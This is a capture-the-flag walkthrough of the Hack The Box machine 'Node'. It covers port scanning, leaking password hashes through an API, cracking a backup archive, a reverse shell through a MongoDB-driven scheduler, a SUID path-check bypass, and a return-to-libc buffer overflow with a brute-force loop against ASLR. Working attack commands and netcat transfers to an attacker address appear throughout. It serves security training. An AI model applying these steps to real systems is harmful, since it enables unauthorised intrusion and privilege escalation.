As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Wed Sep 14 16:44:10 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.58
Nmap scan report for 10.10.10.58
Host is up (0.045s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
# Nmap done at Wed Sep 14 16:44:37 2022 -- 1 IP address (1 host up) scanned in 26.54 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,3000 10.10.10.58 -oN targeted
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Wed Sep 14 16:44:57 2022 as: nmap -sCV -p22,3000 -oN targeted 10.10.10.58
Nmap scan report for 10.10.10.58
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 14 16:45:12 2022 -- 1 IP address (1 host up) scanned in 15.21 seconds
To get more information of the website on port 3000, let's see what the Wappalyzer extension detects.
Wappalyzer is a browser extension capable of detecting the technology stack of any website. It reveals the technology stack of any website, such as CMS, ecommerce platform or payment processor, as well as company and contact details.
The website is made in Node.js. It shows some users on the main page.
Exploitation
In the source code, we can see a few JavaScript files.
The script /assets/js/app/controllers/admin.js shows the /login directory, which contains a login page.
var controllers = angular.module('controllers');
controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
$scope.backup = function () {
$window.open('/api/admin/backup', '_self');
}
$http.get('/api/session')
.then(function (res) {
if (res.data.authenticated) {
$scope.user = res.data.user;
}
else {
$location.path('/login');
}
});
});
The /assets/js/app/controllers/profile.js JavaScript file shows the /api/users/ directory, which contains users, and their password hashes.
var controllers = angular.module('controllers');
controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
$http.get('/api/users/' + $routeParams.username)
.then(function (res) {
$scope.user = res.data;
}, function (res) {
$scope.hasError = true;
if (res.status == 404) {
$scope.errorMessage = 'This user does not exist';
}
else {
$scope.errorMessage = 'An unexpected error occurred';
}
});
});
There is one user called myP14ceAdm1nAcc0uNT which is the admin user for the website. Let's make use of rainbow tables and try to find out the password.
CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.
Let's try to log in with those credentials in the /login page.
There is a button Download Backup, which will download a file called myplace.backup.
The file has a giant string encoded in base64.
cat myplace.backup
UEsDBAo...UAAAA=
If we decoded, we'll see that it seems to be a .zip file. Let's put all the content in myplace.backup.zip.
Now, john should be able to crack the hash pretty fast.
john --wordlist=/usr/share/wordlists/rockyou.txt myplace.backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (myplace.backup.zip)
1g 0:00:00:00 DONE (2022-09-14 23:09) 10.00g/s 1843Kp/s 1843Kc/s 1843KC/s sandriux..joan21
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now, we can unzip the file.
unzip myplace.backup.zip
It looks like a backup of the entire /var/www/html directory. If we take a look inside the app.js file, we'll see some credentials.
There are a few processes. The second one is running the /var/scheduler/app.js script. The script is logging into a MongoDB app with the credentials we found earlier. Then, is checking inside the scheduler database for the tasks collection, and executing the value of the cmd key.
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.58] 40680
bash: cannot set terminal process group (1244): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ whoami
whoami
tom
tom@node:/$ cat /home/tom/user.txt
cat /home/tom/user.txt
275c83d75312ae33f5522e08aeec505a
Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
Now that we belong to the admin group, we can execute the SUID binary.
Let's take a look with ltrace how the program is being executed. First, we can see that it is trying to compare the first argument with -q. This argument seems to activate the quiet mode.
ltrace backup a b c
...
strcmp("a", "-q") = 1
...
Second, it is comparing the second argument with each key stored in /etc/myplace/keys.
If we run the binary without the quiet mode, and giving a proper key, we'll see that it is checking if the third argument exists.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 c
...
[+] Validated access token
[+] Starting archiving c
[!] The target path doesn't exist
...
If we try to give it a path that exists, such as /tmp, we'll get a base64 encoded string.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp
...
[+] Validated access token
[+] Starting archiving /tmp
zip warning: No such device or address
[+] Finished! Encoded backup is below:
UEsDBAoAAAA...FgMAAAAA
With ltrace, we can see that it is creating a ZIP file with the protected password magicword, and then it is encoding the content in base64.
ltrace backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /tmp
As this binary is SUID, and we are executing it as root, we could try to give the /root path as an argument, so then we can decode it, unzip it and take the root flag.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root
If we take a look at the command with ltrace, we'll see that at some point it is checking if the third argument is /root.
ltrace backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root
strstr("/root", "/root") = "/root"
The problem is that it is checking if it is /root, so we could go to the / directory and execute the binary giving root as the third argument. This way we can bypass the restriction, and we'll be able to zip the root directory.
cd /
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 root
Then, decompress the file with 7z giving the password magicword.
7z x root.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed): magicword
Everything is Ok
Size: 2584
Compressed: 1141
This time we are able to see the correct root flag.
cat root/root.txt
ebbdb9069c32150e8a14029e929c5839
Buffer Overflow
There is a way to get a shell as root by exploiting a buffer overflow vulnerability in the backup binary. If we give 1000 A characters as the third argument of the binary, we'll get a segmentation fault.
backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 $(python -c "print('A'*1000)")
...
Segmentation fault (core dumped)
Let's transfer the binary to our local machine. Set a netcat listener on port 5555 pointing to backup.
nc -lvnp 5555 > backup
Then, transfer the binary from the victim machine.
nc 10.10.14.11 5555 < /usr/local/bin/backup
In order to make the binary work, we'll have to give it execution permissions, and we'll have to create the /etc/myplace/keys file on our local machine with the keys.
We are ready to exploit the buffer overflow. Let's run the binary with gdb.
gdb ./backup
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
GEF for linux ready, type `gef' to start, `gef config' to configure
90 commands loaded and 5 functions added for GDB 12.1 in 0.00ms using Python engine 3.10
Reading symbols from ./backup...
(No debugging symbols found in ./backup)
Note that I am using gef. The same way as before, if I run the script with 1000 A characters, it will crash, and I'll be able to see all the registries filled with 41.
The program only has the NX memory protection enabled.
Data Execution Prevention (DEP) or No-Execute (NX) works with the processor to help prevent buffer overflow attacks by blocking code execution from memory that is marked as non-executable.
gef⤠checksec
[+] checksec for '/home/alfa8sa/HTB/machines/node/backup'
Canary : â
NX : â
PIE : â
Fortify : â
RelRO : Partial
But, we can see that ASLR is enabled on the victim machine.
Address space layout randomization(ASLR) is a memory-protection process for operating systems that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.
cat /proc/sys/kernel/randomize_va_space
2
As ASLR is enabled, and the NX memory protection is enabled, the easiest way of exploiting this buffer overflow vulnerability is doing a Return to libc attack.
Return to lib is a tactic used for executing code that is not on the stack but in a sector of memory that is executable, for example in libc. The code used to break the program are functions within this library.
First, let's check at what point we start overwriting the EIP. Create a pattern with gef.
gef⤠pattern create 1000
[+] Generating a pattern of 1000 bytes (n=4)
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaaj
[+] Saved as '$_gef0'
And execute the program giving the pattern as the third argument.
gef⤠r a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 aaaab...yaaj
To exploit Return to Libc, and be able to spawn a shell as root, we'll need the system address, the exit address, the /bin/bash address and the base_libc address. First, we have to get the base_libc address from the victim machine. This address changes every time we execute the binary because ASLR is enabled on the system. But, we'll pick a random one, and execute the final exploit multiple times, so when the base_libc address match, the root shell will appear. In this case is 0xf7579000.
Finally, we'll need the offset of the /bin/sh function, which is 0x0015900b.
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
-a scan the entire file.
-t x print the location of the string in base 16.
15900b /bin/sh
Now, that I have the function's offset and the base_lib address, I can calculate the system, exit and /bin/sh addresses by adding the offset to the base_lib address.
The final payload will be the initial 512 A characters, the system address, the exit address and the /bin/sh address. The following script will calculate all the addresses, and print the final payload.
Finally, if we make a loop of 1000 iterations, run the backup binary, and running the python script as the third argument of the binary, at some point, the base_libc addresses will match, and we'll get a shell as root. Then, all we have to do is reap the harvest and take the root flag.
for i in $(seq 1 1000); do backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 $(python /tmp/bof.py); done
